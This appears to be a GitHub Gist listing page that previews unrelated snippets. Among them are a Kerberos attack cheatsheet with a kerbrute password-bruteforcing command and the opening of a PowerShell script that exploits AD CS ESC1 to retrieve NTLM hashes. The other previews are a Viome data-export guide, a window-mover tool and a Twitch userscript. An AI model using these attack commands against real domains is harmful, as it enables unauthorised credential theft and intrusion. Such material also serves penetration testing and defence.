Skip to content

Instantly share code, notes, and snippets.

@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@0xdevalias
0xdevalias / unofficial-viome-api-endpoints-data-export-backup.md
Last active August 13, 2024 02:26
(unofficial) Guide to Viome API Endpoints, Data Export and Backup

(unofficial) Guide to Viome API Endpoints, Data Export and Backup

Since Viome doesn't appear to offer us a way to export our data aside from as a PDF, I was inspired to have a look if I could see it any other way.


The CEO says that they don't release the raw data:

@solariz
solariz / rescreen.c
Created February 3, 2021 07:56
tiny tool to move all Windows to the main Screen
/* tiny tool to move all Windows to the main Screen
* https://tcpip.wtf/en/rescreen-tool-to-move-all-windows-to-your-win-main-screen.htm
*/
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace rescreen
{
class Program
@BOLL7708
BOLL7708 / twitch-bonus-auto-claimer.js
Last active July 26, 2023 17:35
BOLL's UserScripts
// ==UserScript==
// @name Twitch Bonus Auto Claimer
// @namespace https://github.com/BOLL7708
// @homepageURL https://gist.github.com/BOLL7708/29fe3599000003473c49bb1d62ba1d33
// @downloadURL https://gist.github.com/BOLL7708/29fe3599000003473c49bb1d62ba1d33/raw/twitch-bonus-auto-claimer.js
// @match *://twitch.tv/*
// @match *://www.twitch.tv/*
// @grant GM_getValue
// @grant GM_setValue
// @version 1.0
@b4cktr4ck2
b4cktr4ck2 / esc1.ps1
Created February 22, 2023 21:50
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
#Thank you @NotMedic for troubleshooting/validating stuff!
$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
$CA = $CAFQDN + "\" + $CASERVER